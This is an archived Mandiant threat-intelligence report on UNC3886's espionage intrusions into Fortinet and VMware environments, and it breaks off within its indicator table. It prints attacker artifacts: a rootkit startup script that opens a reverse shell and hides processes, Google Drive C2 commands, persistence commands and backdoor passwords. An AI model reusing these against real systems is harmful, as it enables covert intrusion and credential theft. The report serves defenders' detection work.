{ "id": "4bd80746-74ac-42f7-9681-2784478312f3", "created_at": "2026-04-06T00:12:47.848414Z", "updated_at": "2026-04-10T03:32:46.173397Z", "deleted_at": null, "sha1_hash": "51672fafe669cf99d78fbf7393084e04cf008325", "title": "Cloaked and Covert: Uncovering UNC3886 Espionage Operations", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1190518, "plain_text": "Cloaked and Covert: Uncovering UNC3886 Espionage Operations\r\nBy Mandiant\r\nPublished: 2024-06-18 · Archived: 2026-04-05 17:26:40 UTC\r\nWritten by: Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew Potaczek, Jakub Jozwiak, Alex\r\nMarvi\r\nFollowing the discovery of malware residing within ESXi hypervisors in September 2022, Mandiant began\r\ninvestigating numerous intrusions conducted by UNC3886, a suspected China-nexus cyber espionage actor that\r\nhas targeted prominent strategic organizations on a global scale. In January 2023, Mandiant provided detailed\r\nanalysis of the exploitation of a now-patched vulnerability in FortiOS employed by a threat actor suspected to be\r\nUNC3886. In March 2023, we provided details surrounding a custom malware ecosystem utilized on affected\r\nFortinet devices. Furthermore, the investigation uncovered the compromise of VMware technologies, which\r\nfacilitated access to guest virtual machines.\r\nInvestigations into more recent operations in 2023 following fixes from the vendors involved in the investigation\r\nhave corroborated Mandiant's initial observations that the actor operates in a sophisticated, cautious, and evasive\r\nnature. Mandiant has observed that UNC3886 employed several layers of organized persistence for redundancy to\r\nmaintain access to compromised environments over time. Persistence mechanisms encompassed network devices,\r\nhypervisors, and virtual machines, ensuring alternative channels remain available even if the primary layer is\r\ndetected and eliminated.\r\nThis blog post discusses UNC3886's intrusion path and subsequent actions that were performed in the\r\nenvironments after compromising the guest virtual machines to achieve access to the critical systems, including:\r\nThe use of publicly available rootkits for long-term persistence\r\nDeployment of malware that leveraged trusted third-party services for command and control (C2 or C\u0026C)\r\nSubverting access and collecting credentials with Secure Shell (SSH) backdoors\r\nExtracting credentials from TACACS+ authentication using custom malware \r\nMandiant has published detection and hardening guidelines for ESXi hypervisors and attack techniques employed\r\nby UNC3886. For Google SecOps Enterprise+ customers, rules have been released to your Emerging Threats rule\r\npack, and indicators of compromise (IOCs) listed in this blog post are available for prioritization with Applied\r\nThreat Intelligence. Mandiant recommends that organizations follow the security recommendations within the\r\nVMware and Fortinet advisories and the security recommendations provided in this blog post.\r\nZero-Day Exploitation\r\nIn January 2024, Mandiant published a blog post detailing UNC3886's activities exploiting CVE-2023-34048\r\n(VMware vCenter) since late 2021. The exploitation enables unauthenticated remote command execution on\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 1 of 26\n\nvulnerable vCenter servers. Mandiant observed deployment of attacker backdoors minutes after crashing of the\r\nvulnerable VMware service.\r\nCVE-2023-34048 was not the only zero-day vulnerability exploited by UNC3886 during these intrusions. The\r\nthreat actor exploited three other zero-day vulnerabilities, which have since been patched, to gain access when\r\nobtaining and abusing credentials of existing accounts was infeasible. Figure 1 describes the UNC3886 attack path\r\ninvolving the following zero-day exploitations:\r\nCVE-2022-41328 in FortiOS was exploited to download and execute backdoors on FortiGate devices.\r\nCVE-2022-22948 in VMware vCenter was exploited to obtain encrypted credentials in the vCenter's\r\npostgresDB for further access.\r\nCVE-2023-20867 in VMware Tools was exploited to execute unauthenticated Guest Operations from ESXi\r\nhost to guest virtual machines.\r\nFigure 1: UNC3886 attack path diagram\r\nMandiant observed the threat actor exploit CVE-2022-42475 in FortiOS's Secure Sockets Layer (SSL) virtual\r\nprivate network (VPN) to obtain access in January 2023 after details of the vulnerability had been made public by\r\nFortinet as part of their vulnerability disclosure processes. CVE-2022-42475 allows a remote unauthenticated\r\nattacker to execute arbitrary code or commands via specifically crafted requests.\r\nUse of Publicly Available Rootkits for Long-Term Persistence\r\nAfter exploiting zero-day vulnerabilities to gain access to vCenter servers and subsequently managed ESXi\r\nservers, the actor obtained total control of guest virtual machines that shared the same ESXi server as the vCenter\r\nserver. Mandiant observed the actor use two publicly available rootkits, REPTILE and MEDUSA, on the guest\r\nvirtual machines to maintain access and evade detection.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 2 of 26\n\nREPTILE\r\nREPTILE is an open-source Linux rootkit, implemented as a loadable kernel module (LKM), that provides\r\nbackdoor access to a system. The rootkit and backdoor functionalities are implemented as a separate component\r\nidentified by Mandiant as follows:\r\nREPTILE.CMD is a user-mode component responsible for communicating with the kernel-mode\r\ncomponent to perform actions including hiding files, processes, and network connections.\r\nREPTILE.SHELL is a reverse shell backdoor running in user-mode. The component could be configured to\r\nlisten for a specialized packet in TCP, UDP, or ICMP for activation.\r\nREPTILE kernel-level component is an LKM responsible for hooking kernel functions and modifying\r\nfunctions data as tasked by REPTILE.CMD to achieve rootkit functionality.\r\nREPTILE LKM launcher is responsible for decrypting the actual kernel module code from the file and\r\nloading into the memory.\r\nREPTILE appeared to be the rootkit of choice by UNC3886 as it was observed being deployed immediately after\r\ngaining access to compromised endpoints. REPTILE offers both the common backdoor functionality, such as\r\ncommand execution and file transfer capabilities, as well as stealth functionality that enables the threat actor to\r\nevasively access and control the infected endpoints via port knocking.\r\nMandiant observed that UNC3886 introduced several changes into the REPTILE code base and its auxiliary\r\ncomponents. Some changes are based on the REPTILE code base before version 2.1, which was introduced on\r\nMarch 1, 2020, potentially indicating the actor has been developing and/or operating this rootkit for some time. \r\nOne such change was identified within the UNC3886 REPTILE LKM launcher. In REPTILE version 2.0, the\r\noriginal developer of REPTILE altered how the kernel-level component is loaded, switching from using insmod\r\nto a custom launcher. The launcher Mandiant observed UNC3886 use throughout their operations, based on the\r\ncustom launcher, was updated with a new function to daemonize a process. This function is identical to the\r\npublicly available create_daemon.c .\r\nUNC3886 automated the deployment of REPTILE components with shell scripts. These scripts contained similar\r\ncode to the installation script responsible for building REPTILE components and configuring a persistence\r\nmechanism for the REPTILE kernel-level component. The following additions were observed in the deployment\r\nshell script, which resulted in the creation of different forensic artifacts from the original REPTILE:\r\n1. The threat actor replaced every instance of \"reptile\" with a unique keyword, which resulted in different\r\nfilenames for rootkit component files.\r\nFile Full Path Description\r\n/var/lib/fwupdd/\u003cunique_keyword\u003e_cmd REPTILE.CMD executable\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 3 of 26\n\n/var/lib/fwupdd/\u003cunique_keyword\u003e_reverse REPTILE.SHELL executable\r\n/var/lib/fwupdd/\u003cunique_keyword\u003e_start REPTILE startup shell script\r\n/lib/modules/\u003ckernel_version\u003e/kernel/driver\r\ns/\u003cunique_keyword\u003e/\u003cunique_keyword\u003e\r\nREPTILE kernel-level component\r\n/usr/bin/\u003cunique_keyword\u003e REPTILE LKM launcher\r\n2. The script only deploys the pre-built REPTILE components and files to the paths listed as follows, and\r\nconfigures persistence mechanisms; it does not build the components.\r\n3. While the original REPTILE relies on modprobe and udev in newer versions to load the kernel-level\r\ncomponent, UNC3886 REPTILE relies on creating new RC scripts or systemd unit files with a command\r\nto execute REPTILE LKM launcher to load the kernel-level component, presented as follows. Only a few\r\nREPTILE samples were observed using udev as a persistence mechanism.\r\n/usr/bin/\u003c /lib/modules/\u003ckernel_version\u003e/kernel/drivers/\r\n\u003cunique_keyword\u003e/\u003cunique_keyword\u003e 2\u003e\u0026- 1\u003e\u0026- 0\u003c\u0026-\r\nAside from the modifications made to the deployment shell script by the threat actor, the threat actor introduced a\r\nstartup script containing execution commands and parameters for REPTILE.CMD and REPTILE.SHELL. The\r\nfollowing is a sample of the startup script identified from one of the compromised guest virtual machines.\r\n#!/bin/bash\r\n#\u003cCentos_Selinux_Config_And_Module\u003e\r\n/var/lib/fwupdd/\u003cunique_keyword\u003e_reverse -t \u003cip_address\u003e\r\n-p \u003cport\u003e -s \u003csecret\u003e -r \u003cseconds\u003e\r\n/var/lib/fwupdd/\u003cunique_keyword\u003e_cmd hide `ps -ef | grep\r\n\"ata/0\" | grep -v grep | awk '{print $2}'`\r\n/var/lib/fwupdd/\u003cunique_keyword\u003e_cmd file-tampering\r\n#\u003c/Centos_Selinux_Config_And_Module\u003e\r\nThe startup script tasks REPTILE.SHELL to connect back to the command-and-control (C2 or C\u0026C) server and\r\nlater configures REPTILE.CMD to hide the REPTILE.SHELL process from a process listing result and hide files\r\nfrom being visible. The analysis of the REPTILE samples revealed that the REPTILE.CMD was developed to hide\r\nfile contents enclosed with a string #\u003c/Centos_Selinux_Config_And_Module\u003e when the component is executed\r\nwith a file-tampering parameter.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 4 of 26\n\nMandiant identified a customized sample of REPTILE listeners with Transport Layer Security (TLS) support. The\r\nsample is able to receive communications using TLS over raw Transmission Control Protocol (TCP). Mandiant\r\nobserved the threat actor deployed the customized version of REPTILE along with the victim's legitimate TLS\r\ncertificate and private key obtained from the compromised FortiGate devices.\r\nWhile UNC3886 was observed deploying new rootkits and backdoors with more functionalities, REPTILE\r\nappeared to be the first option to establish a foothold and possibly the last resort for maintaining access due to its\r\nsmall footprints.\r\nMEDUSA and SEAELF\r\nMEDUSA is an open-source rootkit implementing dynamic linker hijacking via LD_PRELOAD. Unlike\r\nREPTILE, which only provides an interactive access with rootkit functionalities, MEDUSA exhibits capabilities\r\nof logging user credentials from the successful authentications, either locally or remotely, and command\r\nexecutions. These capabilities are advantageous to UNC3886 as their modus operandi to move laterally using\r\nvalid credentials.\r\nMandiant assessed the use of MEDUSA to be experimental alternatives of REPTILE and SSH keyloggers. The\r\nadoption of REPTILE was usually observed after the threat actor successfully gained access to compromised\r\nendpoints where it was used to deploy other malware, keyloggers, and utilities. MEDUSA, however, has been\r\ndeployed subsequently on the same compromised endpoints in more recent activities.\r\nDeployment of MEDUSA was accomplished by the MEDUSA installer component, identified by Mandiant as\r\nSEAELF. Mandiant identified two versions of MEDUSA deployed in the compromised endpoints, both using\r\n0xAA as the XOR encryption key to encrypt configuration strings. Mandiant FLARE observed the following\r\nchanges made by the threat actor to the samples:\r\n1. The execve function that would normally filter output from iptables , ip , and the /bin directory no\r\nlonger filter such output.\r\n2. Output from strace , when executed by execve , is redirected to /tmp/orbit.txt by appending -o\r\n/tmp/orbit.txt to the command line.\r\n3. The PAM functions no longer report SSH information and disrupt sudo requests by always returning\r\nPAM_SUCCESS(0) . \r\n4. The following hook functions are missing in the sample:\r\n1. hosts_access\r\n2. shutdown\r\n3. close\r\n4. pam_acct_mgmt\r\n5. pam_sm_authenticate\r\n6. xread\r\nMoreover, the file system evidence indicated changes to the MEDUSA configuration in one version that resulted\r\nin the creation and presence of various MEDUSA artifacts and host-based indicator locations as presented in the\r\nfollowing table.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 5 of 26\n\nName Default Value First Sample Second Sample\r\nMEDUSA administrator\r\nname\r\nadm1n Y0u4reCu6e Y0u4reCu6e\r\nMEDUSA administrator\r\npassword\r\nasdfasdf 1qaz@WSX3edc123 1qaz@WSX3edc123\r\nMEDUSA home directory /usr/lib/libc conf\r\n/usr/lib/libc\r\nconf/\r\n/usr/lib/locate/\r\nssh, scp, and sudo credential\r\nlog\r\n/usr/lib/libseconf\r\n/sshpass2.txt\r\n/usr/lib/libseconf\r\n/local.txt\r\n/usr/lib/locate\r\n/local.txt\r\nsshd credential log\r\n/usr/lib/libseconf\r\n/sshpass.txt\r\n/var/log\r\n/remote.txt\r\n/var/log\r\n/remote.txt\r\nBackdoor listening ports\r\n/usr/lib/libc\r\nconf/.ports\r\n/usr/lib/libc\r\nconf/.pts\r\n/usr/lib/locate\r\n/.pts\r\nMandiant observed the threat actor deploying and executing tools via MEDUSA to capture SSH valid credentials\r\nfrom the compromised endpoints. Upon starting, MEDUSA was configured to execute commands and executables\r\nlisted under /usr/lib/locate/.boot.sh as follows:\r\n/usr/sbin/libvird\r\n/usr/bin/NetworkManage\r\nchcon -t sshd_tmp_t /var/run/cron.data\r\nThe executables and the command constitute a component of the threat actor's attempt to hijack SSH connections\r\nwith the objective of acquiring SSH credentials. Analysis of the executables and their attempts is discussed later in\r\nthis report.\r\nMalware Leveraging Trusted Third Parties as C2 Channel\r\nThe threat actor was observed deploying malware, including MOPSLED and RIFLESPINE, that leverages trusted\r\nthird parties like GitHub and Google Drive as C2 channels while relying on the rootkits for persistence.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 6 of 26\n\nMOPSLED\r\nMOPSLED is a shellcode-based modular backdoor that has the capability to communicate over HTTP or a custom\r\nbinary protocol over TCP to its C2 server. The core functionality of MOPSLED involves expanding its capabilities\r\nby retrieving plugins from the C2 server. MOPSLED also uses a custom ChaCha20 encryption algorithm to\r\ndecrypt embedded and external configuration files.\r\nMandiant observed sharing of MOPSLED between other Chinese cyber espionage groups including APT41.\r\nMandiant considered MOPSLED to be an evolution of CROSSWALK, which can act as a network proxy.\r\nMandiant observed UNC3886 deploy the Linux variant, identified as MOPSLED.LINUX, on vCenter servers and\r\na small number of the compromised endpoints where REPTILE already existed. MOPSLED.LINUX appeared to\r\nbe used only as an initial malware deployed after gaining successful access since the malware does not have\r\nrootkit-like capabilities that could evade detection.\r\nMOPSLED.LINUX was developed to communicate with a dead-drop URL to retrieve an actual C2 address. The\r\nsample associated with UNC3886 was observed sending HTTP GET requests to\r\nhttps://cyberponke.github[.]io/* . The response was decrypted using the ChaCha20 cipher to obtain the\r\nactual C2 IP address. Further communications are implemented as a custom binary protocol similar to HTTP/S.\r\nRIFLESPINE\r\nRIFLESPINE is a cross-platform backdoor that leverages Google Drive to transfer files and execute commands. It\r\nadopts the CryptoPP library to implement the AES algorithm to encrypt and decrypt the data transmitted between\r\nan affected machine and the threat actor.\r\nTo instruct RIFLESPINE, the threat actor creates an encrypted file on Google Drive with instructions for\r\nRIFLESPINE that is then executed by the malware on the target endpoint. The target endpoint's MAC address\r\nmust appear in the filename when it is created. The file is downloaded, RIFLESPINE downloads and decrypts the\r\nfile, and executes the instructions. The executions' outputs will be encrypted, stored in a temporary file, and then\r\nuploaded to Google Drive once more. The following instructions are available for execution:\r\n1. Download file with get command.\r\n2. Upload file with put command.\r\n3. Set next call out time in milliseconds with settime.\r\n4. Execution arbitrary commands with /bin/sh.\r\nUNC3886 deployed RIFLESPINE with an open-source Google Drive CLI client. A systemd service file was\r\ncreated and used to execute the malware as the malware does not contain a persistence mechanism. Upon first\r\ninstallation, the malware collects system information and starts communicating with Google Drive service with\r\nthe following steps:\r\n1. Execute gdrive to obtain the file pertinent to the target endpoint with the following command:\r\ngdrive --refresh-token \u003ctoken\u003e list | grep \"2@\u003cmac_address\u003e\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 7 of 26\n\n2. Write the filename to a temporary file /tmp/syslog\u003crandom_number.rs.\r\n3. Download file to /tmp matching the filename with the following command:\r\ngdrive --refresh-token \u003ctoken\u003e download --path \"/tmp\" -f\r\n4. Decrypt file /tmp/\u003cfilename\u003e to /tmp/\u003cdownload_filename\u003e.de using CryptoPP AES-CBC with key\r\nlibcrypt.so.2 and IV libev.so.5.\r\n5. Read /tmp/\u003cdownload_filename\u003e.de line by line for instructions to execute.\r\n6. After executing the instructions, write output to /tmp/update\u003crandom_number\u003e.tmp.\r\n7. Encrypt response from /tmp/update\u003crandom_number.tmp to /tmp/update\u003crandom_number\u003e.tmp.en using\r\nthe same AES keys as decryption.\r\n8. Upload encrypted response with the following command:\r\ngdrive --refresh-token \u003ctoken\u003e upload --name \"/tmp\r\n/update\u003crandom_number\u003e.tmp.en\"\r\n9. Delay and repeat the previous steps.\r\nSimilar to MOPSLED.LINUX, RIFLESPINE was observed only in a small number of the compromised virtual\r\nmachines. It is reasonable to assume that the threat actor abandoned the idea of using MOPSLED.LINUX and\r\nRIFLESPINE, which do not have rootkit functionality, as backdoors because predictable communications to\r\nGitHub and Google Drive services from virtual machine servers, rather than workstations, could raise suspicions.\r\nSubverting Accesses With Backdoored Applications\r\nMandiant observed UNC3886 relying heavily on collecting and utilizing valid credentials for lateral movement\r\nbetween guest virtual machines running on the compromised VMware ESXi. The following section describes\r\ndifferent techniques used by the threat actor to collect and abuse valid credentials.\r\nBackdoored SSH Executables\r\nAfter gaining access to the guest virtual machines, either through the collection of vpxuser credentials or by\r\nexploiting CVE-2023-20867 in conjunction with VMware Guest Operations abuse to facilitate malicious file\r\ntransfer and execution, UNC3886 was observed deploying backdoored SSH clients and daemons. The purpose of\r\nthese malicious components was the interception and collection of credentials within an XOR-encrypted text file.\r\nAnalysis of the compromised SSH client located at /usr/bin/ssh exposed modifications by the threat actor to\r\nthe userauth_passwd() function, which governs password-based authentication. These modifications (detailed in\r\nFigure 2) introduce instructions designed to harvest SSH credentials from outgoing connections. The credentials\r\nare then XORed with 0xef before storage in the file /var/log/ldapd\u003cunique_keyword\u003e.2.gz .\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 8 of 26\n\nFigure 2: Backdoored userauth_passwd()function\r\nTo facilitate the targeted collection of incoming SSH credentials, threat actors introduced modifications to the\r\nSSH daemon executable located at /usr/sbin/sshd . These modifications were specifically implemented within\r\nthe auth_password() function, responsible for managing password-based authentication within the SSH daemon,\r\nand the sshpam_auth_passwd() function, which facilitates integration with Pluggable Authentication Modules\r\n(PAM). The injected malicious code functions analogously to that observed within the SSH client. However, in\r\nthis instance, harvested credentials are stored within the file /var/log/ldapd\u003cunique_keyword\u003e.1.gz .\r\nFigure 3: Backdoored auth_password()function\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 9 of 26\n\nFigure 4: Backdoored sshpam_auth_passwd() function\r\nIn more recent threat actor activities, Mandiant observed the threat actor installed yum-versionlock to ensure\r\nthat the malicious SSH clients and daemons would survive package upgrades. yum-versionlock enables the\r\nthreat actor to exclude OpenSSH-related packages from the upgrade by adding the current version of OpenSSH\r\npackages to the versionlock.list file. Content of the versionlock.list file is presented as follows with the\r\ntimestamp when the locks were added.\r\n# Added lock on Tue Oct 25 23:28:07 2022\r\nopenssh-clients-0:8.0p1-13.el8.*\r\nopenssh-server-0:8.0p1-13.el8.*\r\nBring Your Own SSH Server\r\nIn addition to the backdoored SSH binaries deployed to collect SSH credentials, the threat actor was observed\r\nleveraging MEDUSA rootkit to deploy a custom SSH server with the same malicious goals.\r\nPer the findings from MEDUSA rootkit analysis, Mandiant indicated that the threat actor utilized BOOT_SCRIPT\r\nparameter of MEDUSA located at /usr/lib/locate/.boot.sh to execute the following executables and a\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 10 of 26\n\ncommand on boot:\r\n/usr/sbin/libvird\r\n/usr/bin/NetworkManage\r\nchcon -t sshd_tmp_t /var/run/cron.data\r\nThe hijacking of SSH connections to obtain credentials starts with the execution of /usr/sbin/libvird .\r\nLibvird , which is an injector based on a publicly available kubo/injector project embedded with a payload.\r\nlibvird creates a library file identified as /lib64/libseconfd.so from the embedded payload and injects the\r\nlibrary to sshd by default if both the target program and the library file are not provided.\r\nMandiant recovered and conducted analysis of the file with the same hash as the payload embedded in libvird .\r\nThe analysis observed that the payload intercepts checkfd() of sshd when executed and verifies if the\r\nreceived data contains SSH-2.0-OpenSSH_6pf . The payload redirects the stream to the Unix socket\r\n/var/run/cron.data .\r\nMandiant identified /usr/bin/NetworkManage as a SSH server based on a publicly available SSH server\r\nwzshiming/sshd. The SSH server creates, monitors, and picks up the connection redirected to the Unix socket\r\n/var/run/cron.data .\r\nLastly, the final command inside /usr/lib/locate/.boot.sh was used to apply the SELinux security context of\r\nthe Unix socket file /var/run/cron.dat to be the predefined sshd_tmp_t context, which is the security context\r\ntailored to temporary files used by the SSH daemon. This to ensure that the Unix socket used by the injector and\r\nthe custom SSH server is accessible and writable when SELinux is enabled.\r\nThe threat actor was observed deploying another injector identified as sentry and the custom SSH server\r\nidentified as sshdng-venter-7.0 on another endpoint. Analysis of the two executables identified the same\r\ninjection and redirection operations as observed with libvird and NetworkManage .\r\nToward the Intrusion Goals\r\nThe Remnants of Internal Recon and Lateral Movement\r\nThe objectives of the threat actor were initially unclear due to limited visibility and the extensive use of rootkits,\r\ntools, and scripts to eliminate forensic artifacts. When considering goal achievement, it is trivial to assume that a\r\ncyber espionage threat actor would focus on specific information. Yet pinpointing the exact type of information\r\nbecomes challenging as it is situational. After a comprehensive analysis of the unallocated space of the\r\ncompromised endpoints acting as a jump server, Mandiant identified some evidence that indicated what the threat\r\nactor's ultimate intentions may have been.\r\nMandiant successfully recovered scan logs generated by NMAP. The scan logs were created using the -oG\r\nparameter, which resulted in the recording of detailed scan information, including the NMAP executable, the scan\r\ninitiation timestamp, the options, and the scan result. The sample log is presented as follows. Note that\r\ninformation related to victim organizations is redacted.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 11 of 26\n\n# Nmap 6.49BETA1 scan initiated [redacted] as: ./sc -sS -Pn -n\r\n--open --host-timeout 30 -T4 -v -oG result.txt -p 902,2012,4786,443\r\nA.B.C.D/24\r\n# Ports scanned: TCP(4;443,902,2012,4786) UDP(0;) SCTP(0;) PROTOCOLS(0;)\r\nHost: A.B.C.1 () Ports: 443/open/tcp//https///,\r\n4786/open/tcp//smart-install///\r\nIgnored State: filtered (2)\r\nHost: A.B.C.1 () Status: Up\r\nHost: A.B.C.1 () Status: Timeout\r\nHost: A.B.C.2 () Status: Up\r\nHost: A.B.C.2 () Ports: 4786/open/tcp//smart-install///\r\nIgnored State: filtered (3)\r\nHost: A.B.C.3 () Status: Up\r\nHost: A.B.C.3 () Ports: 443/open/tcp//https///\r\nIgnored State: filtered (3)\r\nHost: A.B.C.4 () Status: Up\r\nHost: A.B.C.4 () Status: Ports: 902/open/tcp//ideafarm-door///\r\nIgnored State: filtered (3)\r\nHost: A.B.C.5 () Status: Up\r\nHost: A.B.C.5 () Status: Timeout\r\nHost: A.B.C.6 () Status: Up\r\nHost: A.B.C.6 () Ports: 4786/open/tcp//smart-install///\r\nIgnored State: filtered (3)\r\n.......\r\nThe following observations were made from the sample scan log:\r\nNMAP executable: The threat actor brought their own NMAP executable for scanning. The executable\r\nsc was also located on the unallocated space and identified as a stand-alone version of the NMAP.\r\nScanning parameters: TCP SYN scan was initiated in the aggressive mode without DNS resolution and\r\nhost discovery, targeting TCP/443, TCP/902, TCP/2012, and TCP/4786 of 10.A.B.C/24 . The result was\r\nrecorded to result.txt with a record of only open or possibly open ports.\r\nScanning results: The result indicates alive hosts with the open ports.\r\nWith the assumption that the services running on the alive hosts configured with the default port number, the alive\r\nhosts identified with TCP/4786 were possibly Cisco network appliances as the port is commonly assigned for\r\nCisco Smart Install (SMI) service. TCP/902 indicates VMware technologies. By aggregating data from other scan\r\nlogs and validating with the victim, it was established that the targeted networks belonged to foreign networks\r\nunder the management of the victim organization. This marked the point at which a supply chain attack scenario\r\nbecame conceivable.\r\nThe existence of NMAP scan logs suggests that there is connectivity from the jump server to the foreign networks,\r\nalthough accessibility requires legitimate credentials. The final clue aligned with this assumption as the ongoing\r\ninvestigation uncovered malicious activities on a TACACS+ server accessible from the jump server.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 12 of 26\n\nTACACS is a network protocol used in computer networking for providing centralized authentication,\r\nauthorization, and accounting (AAA) service. TACACS+ represents an enhanced and more robust version of the\r\noriginal TACACS protocol. Network appliances employ TACACS+ for security and access control, ensuring that\r\nauthenticated users are authorized to execute actions that are monitored for auditing purposes.\r\nAn unauthorized access to a system functioning as an authentication server like a TACACS+ server is an absolute\r\nsecurity nightmare. The threat actor could access or manipulate user credentials and authorization policies stored\r\nwithin its database. Accountability of TACACS+ would also be affected as the threat actor could tamper with the\r\naccounting logs stored on the TACACS+ server, covering their tracks and concealing malicious activities.\r\nThe following sections describe actions performed by the threat actor to extend their access to the target network\r\nappliances.\r\nCapturing TACACS+ Credentials with LOOKOVER\r\nThe threat actor's first attempt to extend their access to the network appliances by targeting the TACACS server\r\nwas the use of LOOKOVER. LOOKOVER is a sniffer written in C that processes TACACS+ authentication\r\npackets, performs decryption, and writes its contents to a specified file path. LOOKOVER uses the publicly\r\navailable libpcap library to sniff TCP packets.\r\nThe threat actor deployed LOOKOVER on the TACACS+ server at /usr/sbin/au\u003cunique_keyword\u003editd . The\r\nsample required the following environment variables to be configured:\r\nTKEY - TACACS+ pre-shared key; contains default key 7ujm^YHN (required)\r\nFILTER - libpcap filter string (required)\r\nDEVICE - libpcap capture device (optional)\r\nSNFILENAME - processed data output path, optional with default set to /var/lib/libsyslog.so . All data\r\nwritten to this file is XORed with the single byte 0xEF .\r\nAnalysis of the LOOKOVER sample indicates that the samples process TCP packets whose first two bytes of data\r\nare 0xC0 and 0x01 and verify if the next byte is 0x01 or 0x03 . The pattern aligns with TACACS+ packet\r\nheader as described in RFC 8907 as follows:\r\n0xC0 indicates the major ( 0xC ) and the minor ( 0x0 ) TACACS+ version number.\r\n0x01 indicates that the packet type is TAC_PLUS_AUTHEN.\r\nThe next byte indicates the sequence number of the current packet; LOOKOVER targets if the sequence\r\nnumber is 0x01 or 0x03 , which are commonly packets sent from the client to the TACACS+ server.\r\nThe sample verifies if the flag bit is 0x0 , which indicates that the payload is encrypted. If the flag bit is 0x0 ,\r\nthe sample then performs TACACS+ decryption by incorporating the first 12 bytes of TCP along with TKEY into\r\nan MD5 hash and uses the hash to XOR-decode the remainder of the TCP data. The decoded data along with the\r\npacket source IP address and an integer from the first 12 bytes are written to SNFILENAME .\r\nIf the next byte is nonzero, which could indicate a plain text payload, the entire data segment of the TCP packet is\r\nwritten to FILENAME .\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 13 of 26\n\nFigure 5: LOOKOVER's function responsible for handling TACACS+ packets\r\nDuring the analysis of the compromised TACACS+ server, Mandiant identified the presence of\r\n/usr/sbin/au\u003cunique_keyword\u003editd core dump file. Analysis of the core dump file revealed that the threat actor\r\nconfigured the FILTER environment variable as port 49 with /var/log/tac_cisco_\u003cunique_keyword\u003e_log as\r\nSNFILENAME . TCP/49 is used by TACACS+ Login Host protocol to handle an authentication request from\r\ndevices. The process crashed when attempting to encrypt extracted credentials before writing to disks, and this\r\ncould influence the threat actor to employ another approach to target TACACS+.\r\nBackdoored TACACS+ Binary\r\nOn the same TACACS+ server identified with LOOKOVER, Mandiant observed the threat actor replaced the\r\nlegitimate /usr/bin/tac_plus , which is the TACACS+ daemon for Linux, with a malicious version containing\r\ncredential logging functionality.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 14 of 26\n\nThe malicious version of /usr/bin/tac_plus was modified with a new function responsible for logging\r\nTACACS+ credentials to /var/log/tacu\u003cunique_keyword\u003ecs.log . The function was inserted in the verify()\r\nafter the password was validated and in the passwd_file_verify() , which is responsible for confirming a\r\ncredential after the password is confirmed to be correct. The captured credential record is XOR-ed with 0xEF\r\nbefore appending to the credential log file.\r\nFigure 6: Malicious function within tac_plus for capturing credentials\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 15 of 26\n\nFigure 7: Backdoored authentication function of tac_plus\r\nThe Family of VMCI Backdoors\r\nMandiant discovered a new variant of backdoors leveraging the Virtual Machine Communication Interface\r\n(VMCI) as a communication protocol. The VMCI backdoors could facilitate either guest-to-guest or host-to-guest\r\ncommunications to achieve command execution. See the overview of the attacker's use of ESXi Hypervisor VMCI\r\ncommunications for more information.\r\nVIRTUALSHINE is a simple VMware VMCI sockets-based backdoor that provides access to a bash shell.\r\nVIRTUALSHINE connects to a specified target, which streams the bash pty.\r\nVIRTUALPIE is a backdoor written in Python that spawns a demonized IPv6 listener on a hard-coded\r\nTCP port. It supports file transfer, arbitrary command execution, and reverse shell capabilities. It\r\ncommunicates using a custom protocol and the data is encrypted using RC4.\r\nVIRTUALSPHERE is the controller part of a simple VMCI-based backdoor. The malware transmits the\r\nsecond command-line argument over the VMCI socket to the server running inside the target VM.\r\nWe plan to release technical details of the VMCI backdoors in a future blog post.\r\nCampaign 23-022 and Indicators of Compromise\r\nSince March 2023, we have tracked UNC3886 activity leveraging zero-day exploits for Fortinet and VMware\r\ntechnologies as part of Campaign 23-022 in Mandiant Advantage for our customers. The majority of organizations\r\nthat Mandiant has responded to or identified as targets through our own analysis have been located in the North\r\nAmerica, Southeast Asia, or Oceania regions. However, we have also identified evidence of additional victims\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations\r\nPage 16 of 26\n\nlocated in Europe, Africa, and other parts of Asia. Industries that Mandiant has observed being targeted are those\r\ntypically observed in espionage operations, namely governments, telecommunications, technology, aerospace and\r\ndefense, and energy and utility sectors. \r\nTo assist the wider community in hunting and identifying activity outlined in this blog post, we have included a\r\nsubset of these indicators of compromise (IOCs) in this post, and in a publicly available GTI Collection.\r\nHost-Based Indicators\r\nFilename MD5 Family Role\r\ngl.py 381b7a2a6d581e3482c829bfb542a7de   UTILITY\r\ninstall-20220615.py 876787f76867ecf654019bd19409c5b8   INSTALLER\r\nlsuv2_nv.v01 827d8ae502e3a4d56e6c3a238ba855a7   ARCHIVE\r\npayload1.v00 9ea86dccd5bbde47f8641b62a1eeff07   ARCHIVE\r\nrdt fcb742b507e3c074da5524d1a7c80f7f   ARCHIVE\r\nsendPacket.py 